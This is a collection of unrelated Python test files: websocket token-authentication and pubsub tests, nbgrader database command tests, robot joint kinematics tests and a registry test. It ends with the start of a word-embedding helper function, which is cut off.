    # Full pubsub round trip: the handler registers a channel reader, a
    # publisher fires after a delay, and the client must receive the published
    # model's name over the websocket.
    loop = asyncio.get_event_loop()

    @websocket_pubsub("/")
    def handler(ws, params, **kwargs):
        reader = subscription.get_reader(kwargs["manager"])

        @reader.callback
        def send_message(channel_name, model):
            # Forward the published model's name; returning False stops the
            # reader after this one message.
            ws.send_str(model.name)
            return False

        listener = yield from reader.listen()
        yield from asyncio.gather(listener)

    @asyncio.coroutine
    def pub():
        yield from asyncio.sleep(1)  # wait a second for the listener to start
        return subscription.channel.publish(subscription.channel)

    @asyncio.coroutine
    def start_server(loop):
        app = Application()
        app.router.add_route(*handler.route)
        srv = yield from loop.create_server(app.make_handler(), "localhost", 9000)
        return srv

    @asyncio.coroutine
    def go(loop):
        srv = yield from start_server(loop)
        client = yield from ws_connect("http://localhost:9000")
        yield from pub()
        message = yield from client.receive()
        assert message.data == subscription.channel.name
        yield from client.close()
        srv.close()
        yield from srv.wait_closed()

    loop.run_until_complete(go(loop))
def test_websocket_wrapper_authentication_error():
    # With authenticate=True and no token supplied, the websocket handshake
    # must be rejected by the server.
    loop = asyncio.get_event_loop()

    @websocket("/", authenticate=True)
    def handler(ws, params, **kwargs):
        ws.send_str("hello, world!")

    @asyncio.coroutine
    def start_server(loop):
        app = Application()
        app.router.add_route(*handler.route)
        srv = yield from loop.create_server(app.make_handler(), "localhost", 9000)
        return srv

    @asyncio.coroutine
    def go(loop):
        srv = yield from start_server(loop)
        with pytest.raises(WSServerHandshakeError):
            client = yield from ws_connect("http://localhost:9000")
            yield from client.close()
        srv.close()
        yield from srv.wait_closed()

    loop.run_until_complete(go(loop))
@pytest.mark.django_db
def test_websocket_wrapper_invalid_token_error():
    # With authenticate=True, a token that matches no Token row must cause the
    # handshake to be rejected.
    loop = asyncio.get_event_loop()

    @websocket("/", authenticate=True)
    def handler(ws, params, **kwargs):
        ws.send_str("hello, world!")

    @asyncio.coroutine
    def start_server(loop):
        app = Application()
        app.router.add_route(*handler.route)
        srv = yield from loop.create_server(app.make_handler(), "localhost", 9000)
        return srv

    @asyncio.coroutine
    def go(loop):
        srv = yield from start_server(loop)
        with pytest.raises(WSServerHandshakeError):
            # NOTE(review): "<PASSWORD>" looks like a redaction placeholder
            # from the original source; it still serves here as a token that
            # cannot match any real Token key.
            client = yield from ws_connect("http://localhost:9000?token=<PASSWORD>")
            yield from client.close()
        srv.close()
        yield from srv.wait_closed()

    loop.run_until_complete(go(loop))
@pytest.mark.django_db
def test_websocket_wrapper_valid_token(subscription):
    # With a real Token for the subscriber, the handshake must succeed, the
    # handler must see the authenticated user, and the greeting must arrive.
    loop = asyncio.get_event_loop()
    token, _ = Token.objects.get_or_create(user=subscription.subscriber)
    token = token.key

    @websocket("/", authenticate=True)
    def handler(ws, params, **kwargs):
        # The decorator is expected to inject the resolved user into kwargs.
        assert kwargs["user"].id == subscription.subscriber.id
        ws.send_str("hello, world!")

    @asyncio.coroutine
    def start_server(loop):
        app = Application()
        app.router.add_route(*handler.route)
        srv = yield from loop.create_server(app.make_handler(), "localhost", 9000)
        return srv

    @asyncio.coroutine
    def go(loop):
        srv = yield from start_server(loop)
        uri = "http://localhost:9000?token=" + token
        client = yield from ws_connect(uri)
        message = yield from client.receive()
        assert message.data == "hello, world!"
        yield from client.close()
        srv.close()
        yield from srv.wait_closed()

    loop.run_until_complete(go(loop))
def test_websocket_pubsub_wrapper_authentication_error():
    # Same as the plain-websocket auth test, but for the pubsub variant: no
    # token means the handshake must be rejected.
    loop = asyncio.get_event_loop()

    @websocket_pubsub("/", authenticate=True)
    def handler(ws, params, **kwargs):
        ws.send_str("hello, world!")

    @asyncio.coroutine
    def start_server(loop):
        app = Application()
        app.router.add_route(*handler.route)
        srv = yield from loop.create_server(app.make_handler(), "localhost", 9000)
        return srv

    @asyncio.coroutine
    def go(loop):
        srv = yield from start_server(loop)
        with pytest.raises(WSServerHandshakeError):
            client = yield from ws_connect("http://localhost:9000")
            yield from client.close()
        srv.close()
        yield from srv.wait_closed()

    loop.run_until_complete(go(loop))
@pytest.mark.django_db
def test_websocket_pubsub_wrapper_invalid_token_error():
    """A pub/sub handshake carrying an invalid token must be rejected."""
    event_loop = asyncio.get_event_loop()

    @websocket_pubsub("/", authenticate=True)
    def handler(ws, params, **kwargs):
        ws.send_str("hello, world!")

    @asyncio.coroutine
    def serve(loop):
        # Stand up an aiohttp app exposing the wrapped handler on port 9000.
        app = Application()
        app.router.add_route(*handler.route)
        return (yield from loop.create_server(app.make_handler(), "localhost", 9000))

    @asyncio.coroutine
    def scenario(loop):
        server = yield from serve(loop)
        with pytest.raises(WSServerHandshakeError):
            conn = yield from ws_connect("http://localhost:9000?token=<PASSWORD>")
            yield from conn.close()
        server.close()
        yield from server.wait_closed()

    event_loop.run_until_complete(scenario(event_loop))
@pytest.mark.django_db
def test_websocket_pubsub_wrapper_valid_token(subscription):
    """End-to-end pub/sub round trip: an authenticated websocket client
    receives the name of a model published on the subscribed channel."""
    loop = asyncio.get_event_loop()
    # Issue (or reuse) an auth token for the subscribing user.
    token, _ = Token.objects.get_or_create(user=subscription.subscriber)
    token = token.key

    @websocket_pubsub("/", authenticate=True)
    def handler(ws, params, **kwargs):
        assert kwargs["user"].id == subscription.subscriber.id
        reader = subscription.get_reader(kwargs["manager"])

        @reader.callback
        def send_message(channel_name, model):
            # Forward the published model's name to the websocket client.
            # Returning False signals the reader to stop after one message
            # (presumably -- semantics defined by the reader; confirm).
            ws.send_str(model.name)
            return False

        listener = yield from reader.listen()
        yield from asyncio.gather(listener)

    @asyncio.coroutine
    def start_server(loop):
        app = Application()
        app.router.add_route(*handler.route)
        srv = yield from loop.create_server(app.make_handler(), "localhost", 9000)
        return srv

    @asyncio.coroutine
    def pub():
        yield from asyncio.sleep(1)  # wait a second for the listener to start
        return subscription.channel.publish(subscription.channel)

    @asyncio.coroutine
    def go(loop):
        srv = yield from start_server(loop)
        uri = "http://localhost:9000?token=" + token
        client = yield from ws_connect(uri)
        # Publish after connecting so the handler's listener is in place.
        yield from pub()
        message = yield from client.receive()
        assert message.data == subscription.channel.name
        yield from client.close()
        srv.close()
        yield from srv.wait_closed()

    loop.run_until_complete(go(loop))
@pytest.mark.django_db
def test_all_subscriptions(subscription):
    """Saving a message on a subscribed channel pushes its serialized form
    to a client listening on all of the user's subscriptions."""
    loop = asyncio.get_event_loop()
    token, _ = Token.objects.get_or_create(user=subscription.subscriber)
    token = token.key
    # Build (but do not yet save) a message addressed to the subscriber.
    message = mommy.make(Message,
                         channel=subscription.channel,
                         to_user=subscription.subscriber)

    @websocket_pubsub("/", authenticate=True)
    def subscriptions(ws, params, user, manager):
        def callback(channel_name, model):
            ws.send_str(model.serialize())
            return False
        yield from manager.listen_to_all_subscriptions(user, callback)
        # Drain incoming frames until the client disconnects or errors.
        # NOTE: this local `message` shadows the outer fixture message.
        while True:
            message = yield from ws.receive()
            if message.tp in (MsgType.error, MsgType.close):
                break

    @asyncio.coroutine
    def start_server(loop):
        app = Application()
        app.router.add_route(*subscriptions.route)
        srv = yield from loop.create_server(app.make_handler(), "localhost", 9000)
        return srv

    @asyncio.coroutine
    def go(loop):
        srv = yield from start_server(loop)
        uri = "http://localhost:9000?token=" + token
        client = yield from ws_connect(uri)
        yield from asyncio.sleep(1)  # give the listener time to register
        # Saving triggers the publish that the listener forwards to us.
        message.save()
        message_ = yield from client.receive()
        data = json.loads(message_.data)
        message.refresh_from_db()
        assert data[0]["pk"] == message.pk
        yield from client.close()
        srv.close()
        yield from srv.wait_closed()

    loop.run_until_complete(go(loop))
|
1688935
|
from typing import Callable
from indexpy.utils.register import RegisterDict
def test_register_dict():
    """A callable registered under a key is retrievable by that same key."""
    registry: RegisterDict[str, Callable] = RegisterDict()

    @registry.register("foo")
    def foo():
        pass

    assert registry["foo"] is foo
|
1688973
|
import pytest
import datetime
import shutil
import os
from textwrap import dedent
from os.path import join
from ...api import Gradebook, MissingEntry
from .. import run_nbgrader
from .base import BaseTestApp
class TestNbGraderDb(BaseTestApp):
    """Integration tests for the ``nbgrader db`` command-line application."""

    def test_help(self):
        """Does the help display without error?"""
        run_nbgrader(["db", "--help-all"])
        run_nbgrader(["db", "student", "--help-all"])
        run_nbgrader(["db", "student", "list", "--help-all"])
        run_nbgrader(["db", "student", "remove", "--help-all"])
        run_nbgrader(["db", "student", "add", "--help-all"])
        run_nbgrader(["db", "student", "import", "--help-all"])
        run_nbgrader(["db", "assignment", "--help-all"])
        run_nbgrader(["db", "assignment", "list", "--help-all"])
        run_nbgrader(["db", "assignment", "remove", "--help-all"])
        run_nbgrader(["db", "assignment", "add", "--help-all"])
        run_nbgrader(["db", "assignment", "import", "--help-all"])

    def test_no_args(self):
        """Is there an error if no arguments are given?"""
        # Bare subcommands succeed (retcode 0); actions that require a
        # target (remove/add/import) fail with retcode 1.
        run_nbgrader(["db"], retcode=0)
        run_nbgrader(["db", "student"], retcode=0)
        run_nbgrader(["db", "student", "remove"], retcode=1)
        run_nbgrader(["db", "student", "add"], retcode=1)
        run_nbgrader(["db", "student", "import"], retcode=1)
        run_nbgrader(["db", "assignment"], retcode=0)
        run_nbgrader(["db", "assignment", "remove"], retcode=1)
        run_nbgrader(["db", "assignment", "add"], retcode=1)
        run_nbgrader(["db", "assignment", "import"], retcode=1)

    def test_student_add(self, db):
        """Adding a student creates it; re-adding replaces the record, so
        fields omitted on the second add are reset to None."""
        run_nbgrader(["db", "student", "add", "foo", "--db", db])
        with Gradebook(db) as gb:
            student = gb.find_student("foo")
            assert student.last_name is None
            assert student.first_name is None
            assert student.email is None
        run_nbgrader(["db", "student", "add", "foo", "--last-name=FooBar", "--db", db])
        with Gradebook(db) as gb:
            student = gb.find_student("foo")
            assert student.last_name == "FooBar"
            assert student.first_name is None
            assert student.email is None
        run_nbgrader(["db", "student", "add", "foo", "--first-name=FooBar", "--db", db])
        with Gradebook(db) as gb:
            student = gb.find_student("foo")
            assert student.last_name is None
            assert student.first_name == "FooBar"
            assert student.email is None
        run_nbgrader(["db", "student", "add", "foo", "--email=<EMAIL>", "--db", db])
        with Gradebook(db) as gb:
            student = gb.find_student("foo")
            assert student.last_name is None
            assert student.first_name is None
            assert student.email == "<EMAIL>"

    def test_student_remove(self, db):
        """Removing a student deletes it; removing again is an error."""
        run_nbgrader(["db", "student", "add", "foo", "--db", db])
        with Gradebook(db) as gb:
            student = gb.find_student("foo")
            assert student.last_name is None
            assert student.first_name is None
            assert student.email is None
        run_nbgrader(["db", "student", "remove", "foo", "--db", db])
        with Gradebook(db) as gb:
            with pytest.raises(MissingEntry):
                gb.find_student("foo")
        # running it again should give an error
        run_nbgrader(["db", "student", "remove", "foo", "--db", db], retcode=1)

    def test_student_remove_with_submissions(self, db, course_dir):
        """A student with graded submissions can only be removed with --force."""
        run_nbgrader(["db", "student", "add", "foo", "--db", db])
        run_nbgrader(["db", "assignment", "add", "ps1", "--db", db])
        self._copy_file(join("files", "submitted-unchanged.ipynb"), join(course_dir, "source", "ps1", "p1.ipynb"))
        run_nbgrader(["generate_assignment", "ps1", "--db", db])
        self._copy_file(join("files", "submitted-unchanged.ipynb"), join(course_dir, "submitted", "foo", "ps1", "p1.ipynb"))
        run_nbgrader(["autograde", "ps1", "--db", db])
        with Gradebook(db) as gb:
            gb.find_student("foo")
        # it should fail if we don't run with --force
        run_nbgrader(["db", "student", "remove", "foo", "--db", db], retcode=1)
        # make sure we can still find the student
        with Gradebook(db) as gb:
            gb.find_student("foo")
        # now force it to complete
        run_nbgrader(["db", "student", "remove", "foo", "--force", "--db", db])
        # student should be gone
        with Gradebook(db) as gb:
            with pytest.raises(MissingEntry):
                gb.find_student("foo")

    def test_student_remove_with_submissions_f(self, db, course_dir):
        """Same as above but using the short -f flag instead of --force."""
        run_nbgrader(["db", "student", "add", "foo", "--db", db])
        run_nbgrader(["db", "assignment", "add", "ps1", "--db", db])
        self._copy_file(join("files", "submitted-unchanged.ipynb"), join(course_dir, "source", "ps1", "p1.ipynb"))
        run_nbgrader(["generate_assignment", "ps1", "--db", db])
        self._copy_file(join("files", "submitted-unchanged.ipynb"), join(course_dir, "submitted", "foo", "ps1", "p1.ipynb"))
        run_nbgrader(["autograde", "ps1", "--db", db])
        with Gradebook(db) as gb:
            gb.find_student("foo")
        # it should fail if we don't run with --force
        run_nbgrader(["db", "student", "remove", "foo", "--db", db], retcode=1)
        # make sure we can still find the student
        with Gradebook(db) as gb:
            gb.find_student("foo")
        # now force it to complete
        run_nbgrader(["db", "student", "remove", "foo", "-f", "--db", db])
        # student should be gone
        with Gradebook(db) as gb:
            with pytest.raises(MissingEntry):
                gb.find_student("foo")

    def test_student_list(self, db):
        """The student list is printed alphabetically with name and email."""
        run_nbgrader(["db", "student", "add", "foo", "--first-name=abc", "--last-name=xyz", "--email=<EMAIL>", "--db", db])
        run_nbgrader(["db", "student", "add", "bar", "--db", db])
        out = run_nbgrader(["db", "student", "list", "--db", db], stdout=True)
        assert out == dedent(
            """
            There are 2 students in the database:
            bar (None, None) -- None, None
            foo (xyz, abc) -- <EMAIL>, None
            """
        ).strip() + "\n"

    def test_student_import(self, db, temp_cwd):
        """Students can be imported from CSV; an id column is mandatory,
        extra columns are ignored and missing ones leave fields untouched."""
        with open("students.csv", "w") as fh:
            fh.write(dedent(
                """
                id,first_name,last_name,email
                foo,abc,xyz,<EMAIL>
                bar,,,
                """
            ).strip())
        run_nbgrader(["db", "student", "import", "students.csv", "--db", db])
        with Gradebook(db) as gb:
            student = gb.find_student("foo")
            assert student.last_name == "xyz"
            assert student.first_name == "abc"
            assert student.email == "<EMAIL>"
            student = gb.find_student("bar")
            assert student.last_name is None
            assert student.first_name is None
            assert student.email is None
        # check that it fails when no id column is given
        with open("students.csv", "w") as fh:
            fh.write(dedent(
                """
                first_name,last_name,email
                abc,xyz,<EMAIL>
                ,,
                """
            ).strip())
        run_nbgrader(["db", "student", "import", "students.csv", "--db", db], retcode=1)
        # check that it works ok with extra and missing columns
        with open("students.csv", "w") as fh:
            fh.write(dedent(
                """
                id,first_name,last_name,foo
                foo,abc,xyzzzz,blah
                bar,,,
                """
            ).strip())
        run_nbgrader(["db", "student", "import", "students.csv", "--db", db])
        with Gradebook(db) as gb:
            student = gb.find_student("foo")
            assert student.last_name == "xyzzzz"
            assert student.first_name == "abc"
            # email column was absent, so the previously imported value remains
            assert student.email == "<EMAIL>"
            student = gb.find_student("bar")
            assert student.last_name is None
            assert student.first_name is None
            assert student.email is None

    def test_student_import_csv_spaces(self, db, temp_cwd):
        """CSV headers with stray spaces (e.g. " email") are still accepted."""
        with open("students.csv", "w") as fh:
            fh.write(dedent(
                """
                id,first_name,last_name, email
                foo,abc,xyz,<EMAIL>
                bar,,,
                """
            ).strip())
        run_nbgrader(["db", "student", "import", "students.csv", "--db", db])
        with Gradebook(db) as gb:
            student = gb.find_student("foo")
            assert student.last_name == "xyz"
            assert student.first_name == "abc"
            assert student.email == "<EMAIL>"
            student = gb.find_student("bar")
            assert student.last_name is None
            assert student.first_name is None
            assert student.email is None

    def test_assignment_add(self, db):
        """Adding an assignment creates it; re-adding can set a due date."""
        run_nbgrader(["db", "assignment", "add", "foo", "--db", db])
        with Gradebook(db) as gb:
            assignment = gb.find_assignment("foo")
            assert assignment.duedate is None
        run_nbgrader(["db", "assignment", "add", "foo", '--duedate="Sun Jan 8 2017 4:31:22 PM"', "--db", db])
        with Gradebook(db) as gb:
            assignment = gb.find_assignment("foo")
            assert assignment.duedate == datetime.datetime(2017, 1, 8, 16, 31, 22)

    def test_assignment_remove(self, db):
        """Removing an assignment deletes it; removing again is an error."""
        run_nbgrader(["db", "assignment", "add", "foo", "--db", db])
        with Gradebook(db) as gb:
            assignment = gb.find_assignment("foo")
            assert assignment.duedate is None
        run_nbgrader(["db", "assignment", "remove", "foo", "--db", db])
        with Gradebook(db) as gb:
            with pytest.raises(MissingEntry):
                gb.find_assignment("foo")
        # running it again should give an error
        run_nbgrader(["db", "assignment", "remove", "foo", "--db", db], retcode=1)

    def test_assignment_remove_with_submissions(self, db, course_dir):
        """An assignment with submissions can only be removed with --force."""
        run_nbgrader(["db", "student", "add", "foo", "--db", db])
        run_nbgrader(["db", "assignment", "add", "ps1", "--db", db])
        self._copy_file(join("files", "submitted-unchanged.ipynb"), join(course_dir, "source", "ps1", "p1.ipynb"))
        run_nbgrader(["generate_assignment", "ps1", "--db", db])
        self._copy_file(join("files", "submitted-unchanged.ipynb"), join(course_dir, "submitted", "foo", "ps1", "p1.ipynb"))
        run_nbgrader(["autograde", "ps1", "--db", db])
        with Gradebook(db) as gb:
            gb.find_assignment("ps1")
        # it should fail if we don't run with --force
        run_nbgrader(["db", "assignment", "remove", "ps1", "--db", db], retcode=1)
        # make sure we can still find the assignment
        with Gradebook(db) as gb:
            gb.find_assignment("ps1")
        # now force it to complete
        run_nbgrader(["db", "assignment", "remove", "ps1", "--force", "--db", db])
        # assignment should be gone
        with Gradebook(db) as gb:
            with pytest.raises(MissingEntry):
                gb.find_assignment("ps1")

    def test_assignment_remove_with_submissions_f(self, db, course_dir):
        """Same as above but using the short -f flag instead of --force."""
        run_nbgrader(["db", "student", "add", "foo", "--db", db])
        run_nbgrader(["db", "assignment", "add", "ps1", "--db", db])
        self._copy_file(join("files", "submitted-unchanged.ipynb"), join(course_dir, "source", "ps1", "p1.ipynb"))
        run_nbgrader(["generate_assignment", "ps1", "--db", db])
        self._copy_file(join("files", "submitted-unchanged.ipynb"), join(course_dir, "submitted", "foo", "ps1", "p1.ipynb"))
        run_nbgrader(["autograde", "ps1", "--db", db])
        with Gradebook(db) as gb:
            gb.find_assignment("ps1")
        # it should fail if we don't run with --force
        run_nbgrader(["db", "assignment", "remove", "ps1", "--db", db], retcode=1)
        # make sure we can still find the assignment
        with Gradebook(db) as gb:
            gb.find_assignment("ps1")
        # now force it to complete
        run_nbgrader(["db", "assignment", "remove", "ps1", "-f", "--db", db])
        # assignment should be gone
        with Gradebook(db) as gb:
            with pytest.raises(MissingEntry):
                gb.find_assignment("ps1")

    def test_assignment_list(self, db):
        """The assignment list is printed alphabetically with due dates."""
        run_nbgrader(["db", "assignment", "add", "foo", '--duedate="Sun Jan 8 2017 4:31:22 PM"', "--db", db])
        run_nbgrader(["db", "assignment", "add", "bar", "--db", db])
        out = run_nbgrader(["db", "assignment", "list", "--db", db], stdout=True)
        assert out == dedent(
            """
            There are 2 assignments in the database:
            bar (due: None)
            foo (due: 2017-01-08 16:31:22)
            """
        ).strip() + "\n"

    def test_assignment_import(self, db, temp_cwd):
        """Assignments can be imported from CSV with optional due dates."""
        with open("assignments.csv", "w") as fh:
            fh.write(dedent(
                """
                name,duedate
                foo,Sun Jan 8 2017 4:31:22 PM
                bar,
                """
            ).strip())
        run_nbgrader(["db", "assignment", "import", "assignments.csv", "--db", db])
        with Gradebook(db) as gb:
            assignment = gb.find_assignment("foo")
            assert assignment.duedate == datetime.datetime(2017, 1, 8, 16, 31, 22)
            assignment = gb.find_assignment("bar")
            assert assignment.duedate is None

    def test_assignment_import_csv_spaces(self, db, temp_cwd):
        """CSV headers with stray spaces are accepted; a name column is
        mandatory and omitted columns keep previously imported values."""
        with open("assignments.csv", "w") as fh:
            fh.write(dedent(
                """
                name, duedate
                foo,Sun Jan 8 2017 4:31:22 PM
                bar,
                """
            ).strip())
        run_nbgrader(["db", "assignment", "import", "assignments.csv", "--db", db])
        with Gradebook(db) as gb:
            assignment = gb.find_assignment("foo")
            assert assignment.duedate == datetime.datetime(2017, 1, 8, 16, 31, 22)
            assignment = gb.find_assignment("bar")
            assert assignment.duedate is None
        # check that it fails when no id column is given
        with open("assignments.csv", "w") as fh:
            fh.write(dedent(
                """
                duedate
                Sun Jan 8 2017 4:31:22 PM
                ,
                """
            ).strip())
        run_nbgrader(["db", "assignment", "import", "assignments.csv", "--db", db], retcode=1)
        # check that it works ok with extra and missing columns
        with open("assignments.csv", "w") as fh:
            fh.write(dedent(
                """
                name
                foo
                bar
                """
            ).strip())
        run_nbgrader(["db", "assignment", "import", "assignments.csv", "--db", db])
        with Gradebook(db) as gb:
            assignment = gb.find_assignment("foo")
            # duedate column was absent, so the earlier value is preserved
            assert assignment.duedate == datetime.datetime(2017, 1, 8, 16, 31, 22)
            assignment = gb.find_assignment("bar")
            assert assignment.duedate is None

    def test_upgrade_nodb(self, temp_cwd):
        # test upgrading without a database
        run_nbgrader(["db", "upgrade"])

    def test_upgrade_current_db(self, course_dir):
        """Upgrading an already-current database is a no-op that succeeds."""
        # add assignment files
        self._copy_file(join("files", "test.ipynb"), join(course_dir, "source", "ps1", "p1.ipynb"))
        self._copy_file(join("files", "test.ipynb"), join(course_dir, "source", "ps1", "p2.ipynb"))
        # check that nbgrader generate_assignment passes
        run_nbgrader(["generate_assignment", "ps1"])
        # test upgrading with a current database
        run_nbgrader(["db", "upgrade"])

    def test_upgrade_old_db_no_assign(self, course_dir):
        """An old-format database works with `assign` after `db upgrade`."""
        # add assignment files
        self._copy_file(join("files", "test.ipynb"), join(course_dir, "source", "ps1", "p1.ipynb"))
        self._copy_file(join("files", "test.ipynb"), join(course_dir, "source", "ps1", "p2.ipynb"))
        # replace the gradebook with an old version
        self._copy_file(join("files", "gradebook.db"), join(course_dir, "gradebook.db"))
        # upgrade the database
        run_nbgrader(["db", "upgrade"])
        # check that nbgrader assign passes
        run_nbgrader(["assign", "ps1"])

    def test_upgrade_old_db(self, course_dir):
        """generate_assignment fails against an old database until upgraded."""
        # add assignment files
        self._copy_file(join("files", "test.ipynb"), join(course_dir, "source", "ps1", "p1.ipynb"))
        self._copy_file(join("files", "test.ipynb"), join(course_dir, "source", "ps1", "p2.ipynb"))
        # replace the gradebook with an old version
        self._copy_file(join("files", "gradebook.db"), join(course_dir, "gradebook.db"))
        # check that nbgrader generate_assignment fails
        run_nbgrader(["generate_assignment", "ps1"], retcode=1)
        # upgrade the database
        run_nbgrader(["db", "upgrade"])
        # check that nbgrader generate_assignment passes
        run_nbgrader(["generate_assignment", "ps1"])
|
1689019
|
import math, unittest
from collections import namedtuple
from robot import constant
from robot.mech.exceptions import InvalidJointAngleError, InvalidJointDictError
from robot.mech.joint import DenavitHartenberg, JointLimits, Joint
from spatial import Transform, Vector3
def create_dummy_dict(dh: dict = None, limits: dict = None, home: int = None):
    """Build a joint-description dictionary with all of the DH fields present.

    Any section not supplied is filled with placeholder values: each
    namedtuple field is mapped to its positional index, and `home` to 0.
    """
    def numbered_fields(tup):
        # Map each field name of the namedtuple type to 0, 1, 2, ...
        return dict(zip(tup._fields, range(len(tup._fields))))

    if dh is None:
        dh = numbered_fields(DenavitHartenberg)
    if limits is None:
        limits = numbered_fields(JointLimits)
    if home is None:
        home = 0
    return {'dh': dh, 'limits': limits, 'home': home}
class TestJoint(unittest.TestCase):
    """Unit tests for Joint construction, limits, angle setting and transforms."""

    def setUp(self):
        # NOTE: limits are deliberately constructed (high, low) reversed;
        # Joint is expected to swap them (see test_init_swaps_limits).
        dh = DenavitHartenberg(math.radians(45), 50, math.radians( 180), 72)
        limits = JointLimits(math.radians(400), math.radians(-400))
        home = math.radians(45)
        self.joint = Joint(dh, limits, home)

    def test_init_swaps_limits(self):
        """Reversed (high, low) limits are reordered at construction."""
        expected = JointLimits(math.radians(-400), math.radians(400))
        for component in self.joint.limits._fields:
            self.assertEqual(getattr(self.joint.limits, component), getattr(expected, component))

    def test_joint_angle_defaults_to_home_value(self):
        self.assertEqual(self.joint.angle, self.joint.home)

    def test_joint_home_defaults_to_zero(self):
        # With the 'home' key absent from the dict, home defaults to 0.
        d = create_dummy_dict()
        del d['home']
        joint = Joint.from_dict(d)
        self.assertAlmostEqual(joint.home, 0)

    def test_init_home_defaults_to_lower_limit_if_home_is_outside_joint_limits(self):
        d = create_dummy_dict(home = 100)
        joint = Joint.from_dict(d)
        self.assertAlmostEqual(joint.home, joint.limits.low)

    def test_immovable_is_identity_transform(self):
        joint = Joint.Immovable()
        self.assertEqual(joint.transform.dual, Transform.Identity().dual)

    def test_from_dict_converts_degrees_to_radians(self):
        # Dict values are in degrees; the constructed joint stores radians.
        d = create_dummy_dict()
        joint = Joint.from_dict(d)
        self.assertAlmostEqual(joint.dh.alpha, math.radians(d['dh']['alpha']))
        self.assertAlmostEqual(joint.dh.theta, math.radians(d['dh']['theta']))
        self.assertAlmostEqual(joint.limits.low, math.radians(d['limits']['low']))
        self.assertAlmostEqual(joint.limits.high, math.radians(d['limits']['high']))
        self.assertAlmostEqual(joint.home, math.radians(d['home']))

    def test_from_dict_raises_on_missing_dh_key(self):
        # Each DH field is mandatory; removing any one must raise.
        fields = self.joint.dh._fields
        for field in fields:
            with self.subTest(msg=f'Remove `{field}` from dictionary'):
                d = create_dummy_dict()
                del d['dh'][field]
                with self.assertRaises(InvalidJointDictError):
                    Joint.from_dict(d)

    def test_from_dict_handles_limits_key(self):
        """Missing or junk limit entries fall back to +/- infinity; valid
        entries are converted from degrees to radians."""
        TestSpec = namedtuple('TestSpec', 'name input_dict')
        tests = [
            TestSpec("No limits", {}),
            TestSpec("Low only", { 'low': 10 }),
            TestSpec("High only", { 'high': 20 }),
            TestSpec("Both limits", { 'low': 10, 'high': 20 }),
            TestSpec("Junk limits", { 'Junk': 'Limits' })
        ]
        defaults = { 'low': -math.inf, 'high': math.inf }
        for test in tests:
            d = create_dummy_dict(limits=test.input_dict)
            joint = Joint.from_dict(d)
            expecteds = {
                **defaults,
                **{
                    k: math.radians(v)
                    for k, v in test.input_dict.items()
                    if k in JointLimits._fields
                }
            }
            for field in JointLimits._fields:
                with self.subTest(msg=f"{test.name}: `{field}` not as expected"):
                    self.assertEqual(getattr(joint.limits, field), expecteds.get(field))

    def test_set_angle_set_valid_angles_and_raises_for_exceeding_limits(self):
        with self.subTest(f"Valid angle is accepted"):
            valid_angle = (self.joint.limits.high + self.joint.limits.low) / 2
            self.joint.set_angle(valid_angle)
            self.assertAlmostEqual(self.joint.angle, valid_angle)
        with self.subTest(f"Invalid angle raises exception"):
            # high + |low| is guaranteed to exceed the upper limit
            invalid_angle = self.joint.limits.high + abs(self.joint.limits.low)
            with self.assertRaises(InvalidJointAngleError):
                self.joint.set_angle(invalid_angle)

    def test_set_angle_accepts_normalized_values(self):
        # Normalized values map [0, 1] onto [limits.low, limits.high].
        valid_angles = [0, 0.5, 1]
        for valid_angle in valid_angles:
            with self.subTest(f'Valid value {valid_angle}'):
                self.joint.set_angle(valid_angle, normalized=True)
                normalized = valid_angle * self.joint.travel + self.joint.limits.low
                self.assertAlmostEqual(self.joint.angle, normalized)
        invalid_angles = [-1, 2]
        for invalid_angle in invalid_angles:
            with self.subTest(f'Invalid angle {invalid_angle}'):
                with self.assertRaises(AssertionError):
                    self.joint.set_angle(invalid_angle, normalized=True)

    def test_normalized_angle_returns_value_between_zero_and_one(self):
        angles = [
            (self.joint.limits.low, 0),
            (self.joint.limits.high, 1),
            (self.joint.travel / 4 + self.joint.limits.low, 0.25),
        ]
        for angle, normalized_angle in angles:
            with self.subTest(f'Angle {math.degrees(angle)}'):
                self.joint.set_angle(angle)
                self.assertAlmostEqual(normalized_angle, self.joint.normalized_angle)

    def test_transform_constructs_transform_for_joint_angle(self):
        # Expected transform is the standard DH chain: d * theta * a * alpha.
        self.joint.angle = math.radians(30)
        theta = Transform.from_axis_angle_translation(axis = Vector3.Z(), angle = self.joint.dh.theta + self.joint.angle)
        alpha = Transform.from_axis_angle_translation(axis = Vector3.X(), angle = self.joint.dh.alpha)
        d = Transform.from_axis_angle_translation(translation = Vector3(0, 0, self.joint.dh.d))
        a = Transform.from_axis_angle_translation(translation = Vector3(self.joint.dh.a, 0, 0))
        expected = d * theta * a * alpha
        self.assertAlmostEqual(self.joint.transform.dual, expected.dual)

    def test_travel_returns_amount_of_travel_between_limits(self):
        expected = self.joint.limits.high - self.joint.limits.low
        self.assertAlmostEqual(self.joint.travel, expected)

    def test_travel_in_revs_returns_amount_of_travel_in_integer_revolutions(self):
        expected = math.floor((self.joint.limits.high - self.joint.limits.low) / (2 * math.pi))
        self.assertEqual(self.joint.travel_in_revs, expected)

    def test_within_limits_checks_floating_point_angles(self):
        # Generate an angle guaranteed to be inside joint limits
        inside = (self.joint.limits.high - self.joint.limits.low) / 2
        self.assertTrue(self.joint.within_limits(inside))
        # Generate an angle guaranteed to be outside joint limits
        outside = (self.joint.limits.high + abs(self.joint.limits.low))
        self.assertFalse(self.joint.within_limits(outside))

    def test_within_limits_returns_true_for_singular_values(self):
        # Useful for checking limits on the inverse kinematic results
        # Some axes will have singular solutions (meaning infinitely many)
        # So clearly the solution should be considered within limits
        self.assertTrue(self.joint.within_limits(constant.SINGULAR))
|
1689025
|
import logging
import string
import numpy as np
from ...tools.constants import DISEASE_PLACEHOLDER
from ...tools.constants import GENE_PLACEHOLDER
module_logger = logging.getLogger(__name__)
def generate_embedding_matrix(sentences_tokenized, word_vectors, word_to_index, max_length, min_words_mapped=0,
                              replace_disease_gene_tokens=True):
    """
    Build a 3-D word-vector feature array for a batch of tokenized sentences.

    :param sentences_tokenized: list of list of strings - the tokenized sentences
    :param word_vectors: dict mapping integer word indices to their word vectors
    :param word_to_index: dict mapping words to their integer index in word_vectors
    :param max_length: the maximal number of words converted to word vectors per sentence
    :param min_words_mapped: minimal number of words (excluding tagged disease/gene tokens)
        that must be mapped per sentence; otherwise that sentence's matrix is filled with NaN
    :param replace_disease_gene_tokens: if True, tagged disease/gene tokens are mapped to
        the vectors for 'disease' and 'gene'; if False they are ignored
    :return: numpy array shaped (sentence, word, vector component)
    """
    vector_dim = len(word_vectors[0])
    embedding_matrix = np.zeros((len(sentences_tokenized), max_length, vector_dim))
    for row, tokens in enumerate(sentences_tokenized):
        mapped = 0
